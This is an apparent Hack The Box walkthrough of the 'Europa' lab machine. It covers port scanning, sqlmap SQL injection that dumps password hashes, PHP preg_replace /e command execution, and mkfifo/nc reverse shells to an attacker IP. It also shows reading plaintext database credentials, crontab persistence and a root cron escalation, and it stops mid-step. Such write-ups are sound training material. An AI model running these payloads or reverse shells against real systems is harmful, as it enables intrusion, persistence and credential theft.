Europa
Contents
Ports scan
u505@kali:~/HTB/Machines/Haircut$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.22 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-05-07 18:36:09 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.22 Discovered open port 22/tcp on 10.10.10.22 Discovered open port 443/tcp on 10.10.10.22 u505@kali:~/HTB/Machines/Haircut$ nmap -sC -sV 10.10.10.22 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 14:36 EDT Nmap scan report for europa.htb (10.10.10.22) Host is up (0.038s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA) | 256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA) |_ 256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works | ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR | Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb | Not valid before: 2017-04-19T09:06:22 |_Not valid after: 2027-04-17T09:06:22 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds
SSLScan
u505@kali:~/HTB/Machines/Europa$ sslscan --show-certificate https://admin-portal.europacorp.htb/ Version: 2.0.0-static OpenSSL 1.1.1f-dev xx XXX xxxx
Connected to 10.10.10.22
Testing SSL server admin-portal.europacorp.htb on port 443 using SNI name admin-portal.europacorp.htb
SSL/TLS Protocols: SSLv2 disabled SSLv3 disabled TLSv1.0 enabled TLSv1.1 enabled TLSv1.2 enabled TLSv1.3 disabled
TLS Fallback SCSV: Server supports TLS Fallback SCSV
TLS renegotiation: Secure session renegotiation supported
TLS Compression: Compression disabled
Heartbleed: TLSv1.2 not vulnerable to heartbleed TLSv1.1 not vulnerable to heartbleed TLSv1.0 not vulnerable to heartbleed
Supported Server Cipher(s): Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256 Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256 Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256 Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
Server Key Exchange Group(s): TLSv1.2 141 bits sect283k1 TLSv1.2 141 bits sect283r1 TLSv1.2 204 bits sect409k1 TLSv1.2 204 bits sect409r1 TLSv1.2 285 bits sect571k1 TLSv1.2 285 bits sect571r1 TLSv1.2 128 bits secp256k1 TLSv1.2 128 bits secp256r1 (NIST P-256) TLSv1.2 192 bits secp384r1 (NIST P-384) TLSv1.2 260 bits secp521r1 (NIST P-521) TLSv1.2 128 bits brainpoolP256r1 TLSv1.2 192 bits brainpoolP384r1 TLSv1.2 256 bits brainpoolP512r1
Server Signature Algorithm(s): TLSv1.2 rsa_pkcs1_sha1 TLSv1.2 dsa_sha1 TLSv1.2 ecdsa_sha1 TLSv1.2 rsa_pkcs1_sha224 TLSv1.2 dsa_sha224 TLSv1.2 ecdsa_sha224 TLSv1.2 rsa_pkcs1_sha256 TLSv1.2 dsa_sha256 TLSv1.2 ecdsa_secp256r1_sha256 TLSv1.2 rsa_pkcs1_sha384 TLSv1.2 dsa_sha384 TLSv1.2 ecdsa_secp384r1_sha384 TLSv1.2 rsa_pkcs1_sha512 TLSv1.2 dsa_sha512 TLSv1.2 ecdsa_secp521r1_sha512
SSL Certificate: Certificate blob: -----BEGIN CERTIFICATE----- MIIFSDCCA7CgAwIBAgIJAPGhMP4FtiTCMA0GCSqGSIb3DQEBCwUAMIGUMQswCQYD VQQGEwJHUjEPMA0GA1UECAwGQXR0aWNhMQ8wDQYDVQQHDAZBdGhlbnMxGDAWBgNV BAoMD0V1cm9wYUNvcnAgTHRkLjELMAkGA1UECwwCSVQxFzAVBgNVBAMMDmV1cm9w YWNvcnAuaHRiMSMwIQYJKoZIhvcNAQkBFhRhZG1pbkBldXJvcGFjb3JwLmh0YjAe Fw0xNzA0MTkwOTA2MjJaFw0yNzA0MTcwOTA2MjJaMIGUMQswCQYDVQQGEwJHUjEP MA0GA1UECAwGQXR0aWNhMQ8wDQYDVQQHDAZBdGhlbnMxGDAWBgNVBAoMD0V1cm9w YUNvcnAgTHRkLjELMAkGA1UECwwCSVQxFzAVBgNVBAMMDmV1cm9wYWNvcnAuaHRi MSMwIQYJKoZIhvcNAQkBFhRhZG1pbkBldXJvcGFjb3JwLmh0YjCCAaIwDQYJKoZI hvcNAQEBBQADggGPADCCAYoCggGBAKzVzRrrM1MSWnf8zniIPKt0SXGDB2msYUm3 rQJ3j31wPfn9xJOWeIpBCIbtXkRqO3XGrLjG/M0Slp3sa/lQ+1dk8aupaudrJvCm ITzLnGvtzrtyDlPkozH2wqM+tJx351gKhfrdF81TItS8oe3yskPW3MvEDbi5lPQM OVZk4dhFT4l94E1zrRoapU9fqNL66BdEzeEdS6XwntdARBrEyEoCp7nFIGMBKSIn JzxIh2VS98ybxkw58QcDEG9ClDH49nglkKmQfAevGKil8f1f9NYRwW3YOCvuzAA7 Osg+pLEp4de6MEf408+AOhxl4CvgZKYWvmu7b+OSrFDN8cHFy/bQ2fvrjXNazjA0 9FIj4wivJ7JgJOCdXEianNZkvLzqPXGS/dVUrFF5fzyG0z5xOTvABZp86fNa3yNu zLb04h3j04SvfJ+T3CzkZDWVsFvOYdKsce600S/iaUoqE7XQH6QPB54ba5ailVtH npmV1uVqVxT7tXAs0ztIDpqzJ0XAnwIDAQABo4GaMIGXMB0GA1UdDgQWBBSdw09g /iRsaKt8R137PRpTAfuTgTA6BgNVHREEMzAxghJ3d3cuZXVyb3BhY29ycC5odGKC G2FkbWluLXBvcnRhbC5ldXJvcGFjb3JwLmh0YjAfBgNVHSMEGDAWgBSdw09g/iRs aKt8R137PRpTAfuTgTAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIFoDANBgkqhkiG 9w0BAQsFAAOCAYEAbv2ccFD/d2ovr3dkIqL1m2Qo3AgMObUaBczB37KDsB0w6lzf EOM/aBVth8LarblnVUJE0tk8Io7VBcTP9hF2nt3BuSM0mF6yMY3WRY+23JJpNxSO nOrZ1xLB7a6XTwSTWD0kg2bRbjSbiEWaUzY/RrqtCF1NThgyXo0wuMWPpPICmbd/ 5ID8iOH+rmR3nR4fP80J38SUmvrsXAmifbsbKaKHspNMclQ2Idfiyv53xAoFrJzV cuxHKyBxYn8A5DPRIhbesLF2NAy0d4aziNeVgGQnSA9cV9RhN454nuzwqKb33BlF L8cpG59w3xR8RuyTyZql4uBPZtogzh0pc0PyxX2E2O5nbn85aqYDkVW7aUkeiU69 LAiIp8s6Z+Rhe2rN4RAudtMcWaMTwjBOb1k1UrJ+0T7Av3O5nJk5kd/Ee5LUD2jX wE9Q72WLg1HP/PSSJPsNASSAW4OWSYG1CqLIhfRk5wJtfi6oR9VO+CpajWvqB0Ej PTXIrDgdEK1VKan9 -----END CERTIFICATE----- Version: 2 Serial Number: f1:a1:30:fe:05:b6:24:c2 Signature Algorithm: sha256WithRSAEncryption Issuer: /C=GR/ST=Attica/L=Athens/O=EuropaCorp Ltd./OU=IT/CN=europacorp.htb/emailAddress=admin@europacorp.htb Not valid before: Apr 19 09:06:22 2017 GMT Not valid after: Apr 17 09:06:22 2027 GMT Subject: /C=GR/ST=Attica/L=Athens/O=EuropaCorp Ltd./OU=IT/CN=europacorp.htb/emailAddress=admin@europacorp.htb Public Key Algorithm: NULL RSA Public Key: (3072 bit) RSA Public-Key: (3072 bit) Modulus: 00:ac:d5:cd:1a:eb:33:53:12:5a:77:fc:ce:78:88: 3c:ab:74:49:71:83:07:69:ac:61:49:b7:ad:02:77: 8f:7d:70:3d:f9:fd:c4:93:96:78:8a:41:08:86:ed: 5e:44:6a:3b:75:c6:ac:b8:c6:fc:cd:12:96:9d:ec: 6b:f9:50:fb:57:64:f1:ab:a9:6a:e7:6b:26:f0:a6: 21:3c:cb:9c:6b:ed:ce:bb:72:0e:53:e4:a3:31:f6: c2:a3:3e:b4:9c:77:e7:58:0a:85:fa:dd:17:cd:53: 22:d4:bc:a1:ed:f2:b2:43:d6:dc:cb:c4:0d:b8:b9: 94:f4:0c:39:56:64:e1:d8:45:4f:89:7d:e0:4d:73: ad:1a:1a:a5:4f:5f:a8:d2:fa:e8:17:44:cd:e1:1d: 4b:a5:f0:9e:d7:40:44:1a:c4:c8:4a:02:a7:b9:c5: 20:63:01:29:22:27:27:3c:48:87:65:52:f7:cc:9b: c6:4c:39:f1:07:03:10:6f:42:94:31:f8:f6:78:25: 90:a9:90:7c:07:af:18:a8:a5:f1:fd:5f:f4:d6:11: c1:6d:d8:38:2b:ee:cc:00:3b:3a:c8:3e:a4:b1:29: e1:d7:ba:30:47:f8:d3:cf:80:3a:1c:65:e0:2b:e0: 64:a6:16:be:6b:bb:6f:e3:92:ac:50:cd:f1:c1:c5: cb:f6:d0:d9:fb:eb:8d:73:5a:ce:30:34:f4:52:23: e3:08:af:27:b2:60:24:e0:9d:5c:48:9a:9c:d6:64: bc:bc:ea:3d:71:92:fd:d5:54:ac:51:79:7f:3c:86: d3:3e:71:39:3b:c0:05:9a:7c:e9:f3:5a:df:23:6e: cc:b6:f4:e2:1d:e3:d3:84:af:7c:9f:93:dc:2c:e4: 64:35:95:b0:5b:ce:61:d2:ac:71:ee:b4:d1:2f:e2: 69:4a:2a:13:b5:d0:1f:a4:0f:07:9e:1b:6b:96:a2: 95:5b:47:9e:99:95:d6:e5:6a:57:14:fb:b5:70:2c: d3:3b:48:0e:9a:b3:27:45:c0:9f Exponent: 65537 (0x10001) X509v3 Extensions: X509v3 Subject Key Identifier: 9D:C3:4F:60:FE:24:6C:68:AB:7C:47:5D:FB:3D:1A:53:01:FB:93:81 X509v3 Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb X509v3 Authority Key Identifier: keyid:9D:C3:4F:60:FE:24:6C:68:AB:7C:47:5D:FB:3D:1A:53:01:FB:93:81
X509v3 Basic Constraints: CA:TRUE X509v3 Key Usage: Digital Signature, Key Encipherment Verify Certificate: unable to get local issuer certificate
SSL Certificate: Signature Algorithm: sha256WithRSAEncryption RSA Key Strength: 3072
Subject: europacorp.htb Altnames: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb Issuer: europacorp.htb
Not valid before: Apr 19 09:06:22 2017 GMT Not valid after: Apr 17 09:06:22 2027 GMT
Web server port 80
The default apache page.
Web server port 443
The default apache page.
Web server admin-portal port 443
This time we find a login page.
Sqlmap
We try to find if the page is vulnerable to SQL injection
Login with an email address and a password.
Burp intercepts the request.
u505@kali:~/HTB/Machines/Europa$ cat login.req POST /login.php HTTP/1.1 Host: admin-portal.europacorp.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://admin-portal.europacorp.htb/login.php Content-Type: application/x-www-form-urlencoded Content-Length: 38 Connection: close Cookie: PHPSESSID=54cc5abuoe6iel56vd08vqpgo0 Upgrade-Insecure-Requests: 1
email=admin%40gmail.com&password=admin
Run sqlmap
u505@kali:~/HTB/Machines/Europa$ sqlmap -r login.req --force-ssl ___ __H__ ___ ___[)]_____ ___ ___ {1.4.4#stable} |_ -| . ['] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:38:54 /2020-05-10/
[09:38:54] [INFO] parsing HTTP request from 'login.req' [09:38:54] [INFO] testing connection to the target URL [09:38:54] [INFO] checking if the target is protected by some kind of WAF/IPS [09:38:55] [INFO] testing if the target URL content is stable [09:38:55] [INFO] target URL content is stable [09:38:55] [INFO] testing if POST parameter 'email' is dynamic [09:38:55] [WARNING] POST parameter 'email' does not appear to be dynamic [09:38:55] [INFO] heuristic (basic) test shows that POST parameter 'email' might be injectable (possible DBMS: 'MySQL') [09:38:56] [INFO] heuristic (XSS) test shows that POST parameter 'email' might be vulnerable to cross-site scripting (XSS) attacks [09:38:56] [INFO] testing for SQL injection on POST parameter 'email' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y [09:39:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [09:39:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [09:39:12] [INFO] testing 'Generic inline queries' [09:39:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' [09:39:22] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' [09:39:23] [WARNING] reflective value(s) found and filtering out [09:39:31] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' [09:39:40] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' [09:39:42] [INFO] POST parameter 'email' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --string="beta") [09:39:42] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [09:39:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [09:39:42] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [09:39:43] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [09:39:43] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [09:39:43] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' [09:39:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [09:39:44] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [09:39:44] [INFO] POST parameter 'email' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [09:39:44] [INFO] testing 'MySQL inline queries' [09:39:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [09:39:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [09:39:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [09:39:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [09:39:45] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [09:39:45] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [09:39:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [09:39:56] [INFO] POST parameter 'email' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [09:39:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [09:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [09:39:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [09:39:56] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [09:39:57] [INFO] target URL appears to have 5 columns in query got a 302 redirect to 'https://admin-portal.europacorp.htb/dashboard.php'. Do you want to follow? [Y/n] y redirect is a result of a POST request. Do you want to resend original POST data n do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] [09:41:19] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') [09:41:24] [INFO] target URL appears to be UNION injectable with 5 columns injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] [09:41:47] [INFO] testing 'MySQL UNION query (86) - 21 to 40 columns' [09:41:52] [INFO] testing 'MySQL UNION query (86) - 41 to 60 columns' [09:41:56] [INFO] testing 'MySQL UNION query (86) - 61 to 80 columns' [09:42:00] [INFO] testing 'MySQL UNION query (86) - 81 to 100 columns' POST parameter 'email' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 345 HTTP(s) requests: --- Parameter: email (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: email=admin@gmail.com' RLIKE (SELECT (CASE WHEN (5017=5017) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- edbI&password=admin
Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: email=admin@gmail.com' OR (SELECT 3432 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (ELT(3432=3432,1))),0x716b767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tfIz&password=admin
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=admin@gmail.com' AND (SELECT 9458 FROM (SELECT(SLEEP(5)))uDsZ)-- MDKu&password=admin --- [09:42:11] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 [09:42:13] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/admin-portal.europacorp.htb'
[*] ending @ 09:42:13 /2020-05-10/
sqlmap did a real good job, and once it gets legin, because of the cookie, we can access the dashboard.
u505@kali:~/HTB/Machines/Europa$ sqlmap -r login.req --force-ssl --dump ___ __H__ ___ ___["]_____ ___ ___ {1.4.4#stable} |_ -| . [,] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:42:40 /2020-05-10/
[09:42:40] [INFO] parsing HTTP request from 'login.req' [09:42:40] [INFO] resuming back-end DBMS 'mysql' [09:42:40] [INFO] testing connection to the target URL got a 302 redirect to 'https://admin-portal.europacorp.htb/dashboard.php'. Do yo redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] sqlmap resumed the following injection point(s) from stored session: --- Parameter: email (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: email=admin@gmail.com' RLIKE (SELECT (CASE WHEN (5017=5017) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- edbI&password=admin
Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: email=admin@gmail.com' OR (SELECT 3432 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (ELT(3432=3432,1))),0x716b767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tfIz&password=admin
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=admin@gmail.com' AND (SELECT 9458 FROM (SELECT(SLEEP(5)))uDsZ)-- MDKu&password=admin --- [09:42:47] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 [09:42:47] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries [09:42:47] [INFO] fetching current database [09:42:47] [INFO] retrieved: 'admin' [09:42:47] [INFO] fetching tables for database: 'admin' [09:42:48] [INFO] retrieved: 'users' [09:42:48] [INFO] fetching columns for table 'users' in database 'admin' [09:42:48] [INFO] retrieved: 'id' [09:42:48] [INFO] retrieved: 'int(11)' [09:42:49] [INFO] retrieved: 'username' [09:42:49] [INFO] retrieved: 'varchar(255)' [09:42:49] [INFO] retrieved: 'email' [09:42:49] [INFO] retrieved: 'varchar(255)' [09:42:49] [INFO] retrieved: 'password' [09:42:50] [INFO] retrieved: 'varchar(255)' [09:42:50] [INFO] retrieved: 'active' [09:42:50] [INFO] retrieved: 'tinyint(1)' [09:42:50] [INFO] fetching entries for table 'users' in database 'admin' [09:42:51] [INFO] retrieved: '1' [09:42:51] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff' [09:42:51] [INFO] retrieved: '1' [09:42:51] [INFO] retrieved: 'admin@europacorp.htb' [09:42:52] [INFO] retrieved: 'administrator' [09:42:52] [INFO] retrieved: '2' [09:42:52] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff' [09:42:52] [INFO] retrieved: '1' [09:42:52] [INFO] retrieved: 'john@europacorp.htb' [09:42:53] [INFO] retrieved: 'john' [09:42:53] [INFO] recognized possible password hashes in column '`password`' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] do you want to crack them via a dictionary-based attack? [Y/n/q] n Database: admin Table: users [2 entries] +------+----------------------+--------+---------------+----------------------------------+ | id | email | active | username | password | +------+----------------------+--------+---------------+----------------------------------+ | 1 | admin@europacorp.htb | 1 | administrator | 2b6d315337f18617ba18922c0b9597ff | | 2 | john@europacorp.htb | 1 | john | 2b6d315337f18617ba18922c0b9597ff | +------+----------------------+--------+---------------+----------------------------------+
[09:43:05] [INFO] table '`admin`.users' dumped to CSV file '/home/u505/.sqlmap/output/admin-portal.europacorp.htb/dump/admin/users.csv' [09:43:05] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/admin-portal.europacorp.htb'
[*] ending @ 09:43:05 /2020-05-10/
Alternative Manual SQL Injection
Sqlmap gives us directly access to the dashboard even with the wrong email. With the correct email, we can easily logon the correct application.
There is a field control to validate the email field on the client side. We login with the correct email.
Tamper the request with Burp.
We access the dashbord.
Crack the password
Another way to login is to crack the hash discovered by sqlmap. Hashcat didn't crack the password with rockyou or Collection1 password lists. But it's known by online hash lists.
Tools page
The page dashboard doesn't give any hints except the page tools.
If we fill the field with a value.
It's reflected on the response.
The parameter pattern seems to be a regular expression, and it's applied to the value of the parameter ipaddress.
If the parameter pattern is local-address and ipaddress is system('whoami'), the text is replaced. But is not executed.
PHP PCRE (Perl compatible regular expressions) functions can be exploited with the modifier /e that extends the functionality and interpret the replaced text. If we add the modifier e, the text local-address is replaced by www-data. www-data is the result of the execution of system('whoami').
Reverse shell
u505@kali:~/HTB/Machines/Europa$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Creation of a simple reverse shell script. u505@kali:~/HTB/Machines/Europa/www$ cat shell.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 4444 >/tmp/f
Turn on the web listener.
u505@kali:~/HTB/Machines/Europa/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
First step is to download the shell script and save it in /tmp/shell.sh
u505@kali:~/HTB/Machines/Europa/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.22 - - [10/May/2020 13:38:33] "GET /shell.sh HTTP/1.1" 200 -
Second step, we call our shell.
u505@kali:~/HTB/Machines/Europa$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.22. Ncat: Connection from 10.10.10.22:59830. /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" /bin/sh: 1: python: not found $ python3 -c "import pty;pty.spawn('/bin/bash')" www-data@europa:/var/www/admin$ stty raw -echo stty raw -echo
User Flag
User flag is accessible from www-data user.
www-data@europa:/var/www/admin$ cat /home/john/user.txt <USER_FLAG>
Enumeration
DB
We can access the DB, but we already find this information with sqlmap.
www-data@europa:/var/www/admin$ cat db.php <?php $connection = mysqli_connect('localhost', 'john', 'iEOERHRiDnwkdnw'); if (!$connection){ die("Database Connection Failed" . mysqli_error($connection)); } $select_db = mysqli_select_db($connection, 'admin'); if (!$select_db){ die("Database Selection Failed" . mysqli_error($connection)); }
www-data@europa:/var/www/admin$ mysql -u john -p Enter password: iEOERHRiDnwkdnw
Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 3644 Server version: 5.7.18-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> use admin use admin Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables; show tables; +-----------------+ | Tables_in_admin | +-----------------+ | users | +-----------------+ 1 row in set (0.00 sec)
mysql> select * from users; select * from users; +----+---------------+----------------------+----------------------------------+--------+ | id | username | email | password | active | +----+---------------+----------------------+----------------------------------+--------+ | 1 | administrator | admin@europacorp.htb | 2b6d315337f18617ba18922c0b9597ff | 1 | | 2 | john | john@europacorp.htb | 2b6d315337f18617ba18922c0b9597ff | 1 | +----+---------------+----------------------+----------------------------------+--------+ 2 rows in set (0.00 sec)
cronjob
The file clearlogs on the folder cronjobs suggests that a cronjob runs periodically on this server.
www-data@europa:/var/www/cronjobs$ cat clearlogs
#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, );
exec('/var/www/cmd/logcleared.sh');
?>
We create a second shell to analyze processes with pspy
u505@kali:~/HTB/Machines/Europa$ rlwrap nc -lnvp 4445 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4445 Ncat: Listening on 0.0.0.0:4445
We create the second shell file
www-data@europa:/tmp$ cat shell2 rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>&1|nc 10.10.14.21 4445 >/tmp/g
We add a crontab line to execute our shell each minute
www-data@europa:/tmp$ echo "* * * * * sh /tmp/shell2" | crontab echo "* * * * * sh /tmp/shell2" | crontab www-data@europa:/tmp$ crontab -l crontab -l * * * * * sh /tmp/shell2
Within a minute, the second shell is opened.
u505@kali:~/HTB/Machines/Europa$ rlwrap nc -lnvp 4445 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4445 Ncat: Listening on 0.0.0.0:4445 Ncat: Connection from 10.10.10.22. Ncat: Connection from 10.10.10.22:34134. /bin/sh: 0: can't access tty; job control turned off $ python3 -c "import pty;pty.spawn('/bin/bash')" www-data@europa:~$ stty raw -echo stty raw -echo www-data@europa:~$ cd /tmp www-data@europa:/tmp$ wget -q http://10.10.14.21/pspy64 www-data@europa:/tmp$ chmod +x pspy64 www-data@europa:/tmp$ ./pspy64
As expected a cronjob is launch each minute with user root.
2020/05/10 21:15:01 CMD: UID=0 PID=3709 | /bin/sh -c /var/www/cronjobs/clearlogs
Escalation of privileges
We open a third listener.
u505@kali:~/HTB/Machines/Europa$ rlwrap nc -lnvp 4446 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446
We create the file logcleared.sh
